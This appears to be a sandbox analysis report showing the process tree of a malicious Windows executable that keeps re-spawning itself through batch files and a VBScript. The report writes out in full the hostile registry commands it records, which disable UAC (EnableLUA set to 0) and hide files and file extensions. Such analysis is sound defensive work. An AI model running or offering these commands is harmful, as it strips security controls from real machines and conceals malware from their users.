        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\FacAUoIg.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        26⤵
        
        PID:2768
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        27⤵
        
        PID:460
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        26⤵
        
        PID:1924
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        26⤵
        
        PID:2724
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        26⤵
        
        PID:1380
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        26⤵
        
        PID:1056
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        23⤵
        
        PID:1600
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        23⤵
        
        PID:2068
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        23⤵
        
        PID:368
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\muYQEsAc.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        23⤵
        
        PID:592
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        22⤵
        
        PID:1900
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        23⤵
        
        PID:1504
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        21⤵
        
        PID:2344
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        21⤵
        
        PID:788
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        21⤵
        UAC bypass
        
        PID:2736
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\VmswIkYY.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        21⤵
        
        PID:328
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        21⤵
        
        PID:2944
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        19⤵
        Modifies registry key
        
        PID:1884
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        19⤵
        
        PID:2036
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        19⤵
        UAC bypass
        
        PID:2932
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\GUAIYMAc.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        19⤵
        
        PID:1772
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        17⤵
        UAC bypass
        
        PID:1112
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        17⤵
        
        PID:2900
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        17⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1620
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\qUIYsgog.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        17⤵
        
        PID:2020
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        16⤵
        
        PID:2980
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        15⤵
        
        PID:2652
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        15⤵
        
        PID:328
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        16⤵
        
        PID:868
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        17⤵
        
        PID:3024
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        18⤵
        
        PID:3060
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        18⤵
        
        PID:2372
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        18⤵
        
        PID:960
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        15⤵
        Modifies registry key
        
        PID:564
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\lIUIIoQk.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        15⤵
        
        PID:1540
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        16⤵
        
        PID:696
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        13⤵
        Modifies visibility of file extensions in Explorer
        
        PID:860
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        13⤵
        
        PID:1056
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        14⤵
        
        PID:1624
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        15⤵
        
        PID:1884
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        16⤵
        
        PID:2932
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        17⤵
        
        PID:2468
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        18⤵
        
        PID:1524
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        19⤵
        
        PID:1284
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        20⤵
        
        PID:2776
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        21⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2556
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\SIQwQQMY.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        21⤵
        
        PID:2160
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        22⤵
        
        PID:2636
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        21⤵
        
        PID:2504
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        21⤵
        
        PID:2244
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        21⤵
        
        PID:1720
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\zUQIUkEc.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        19⤵
        
        PID:2132
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        20⤵
        
        PID:1984
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        19⤵
        UAC bypass
        
        PID:2980
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        19⤵
        
        PID:572
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        19⤵
        
        PID:2368
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        17⤵
        
        PID:2208
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\EcoYsIkE.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        17⤵
        
        PID:532
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        18⤵
        
        PID:1192
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        17⤵
        
        PID:1916
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        17⤵
        
        PID:1800
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        18⤵
        
        PID:3048
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\zykYIgso.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        15⤵
        
        PID:320
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        16⤵
        
        PID:2380
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        15⤵
        UAC bypass
        
        PID:1708
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        15⤵
        
        PID:2400
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        15⤵
        
        PID:1540
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        13⤵
        
        PID:2200
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\qsMkMwcc.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        13⤵
        
        PID:2192
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        11⤵
        UAC bypass
        
        PID:1300
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        11⤵
        
        PID:2912
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        11⤵
        
        PID:2624
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\WCkgEwsQ.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        11⤵
        
        PID:1372
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        12⤵
        
        PID:1080
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        11⤵
        
        PID:788
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        9⤵
        
        PID:1448
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        9⤵
        
        PID:2224
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        9⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1164
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\ssowksAc.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        9⤵
        
        PID:2412
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        7⤵
        
        PID:2432
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        7⤵
        
        PID:1668
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        7⤵
        UAC bypass
        Modifies registry key
        
        PID:572
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\VQIwkAYI.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        7⤵
        
        PID:1968
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        8⤵
        
        PID:988
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        5⤵
        
        PID:460
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        5⤵
        
        PID:2088
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        5⤵
        Modifies visibility of file extensions in Explorer
        UAC bypass
        
        PID:2716
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\WUMEMQcs.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        5⤵
        
        PID:2108
      - C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        6⤵
        
        PID:2908
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  PID:296
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  - Modifies registry key
  PID:2076
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  - Modifies visibility of file extensions in Explorer
  PID:2428
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\RicIQsAs.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
  2⤵
  PID:2092
- - C:\Windows\SysWOW64\cscript.exe
    cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
    3⤵
    PID:1528

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
1⤵
PID:2716

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
- Modifies registry key
PID:2760

C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
1⤵
PID:1268

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:2880

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:1524

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:2708

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-555828552257924157-1530934288-1464958668-6991804162059025222-19858836991679776698"
1⤵
PID:2460

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\jaQgQEsI.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
1⤵
PID:2564

C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
1⤵
PID:2840
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
  2⤵
  PID:2776
- - C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
    C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2080
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
      4⤵
      PID:1488
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
      4⤵
      PID:1440
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
      4⤵
      PID:328
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
      4⤵
      PID:2436
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\XMMIAMsA.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
      4⤵
      PID:2120
    - - C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        5⤵
        
        PID:3000
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  PID:2984
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  - UAC bypass
  - Modifies registry key
  PID:1204
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:572
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\qQcgoQEw.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
  2⤵
  PID:1448
- - C:\Windows\SysWOW64\cscript.exe
    cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
    3⤵
    PID:2896

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1627173201-811984630891936745134139947920805733591537577205-14963354911584528224"
1⤵
PID:2692

C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1900
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
  2⤵
  PID:1628
- - C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
    C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2500
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
      4⤵
      PID:2344
    - - C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2444
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        6⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1704
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        6⤵
        
        PID:108
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        6⤵
        
        PID:532
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2876
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\FuQYowcs.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        6⤵
        
        PID:1424
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        7⤵
        
        PID:2496
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
      4⤵
      PID:2496
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
      4⤵
      PID:1828
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
      4⤵
      PID:1596
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\MMoQEIIg.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
      4⤵
      PID:1372
    - - C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        5⤵
        
        PID:1104
    - - C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        5⤵
        
        PID:2036
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  PID:1380
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  PID:1928
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:2452
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\ICMsgkQU.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
  2⤵
  PID:960
- - C:\Windows\SysWOW64\cscript.exe
    cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
    3⤵
    PID:2816

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "607967130-1622105078-1672174664-122648912560267279-16403520359878169691233066521"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1104

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1605753911-23024532225932368-90253966-28640363-1089852124-1107384470-1807469074"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2840

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-127425761614335609283277977261708841431-479041051136749729-100503583100236581"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2860

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:2124

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:2368

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:2232

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:2904

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:788

C:\Windows\system32\conhost.exe
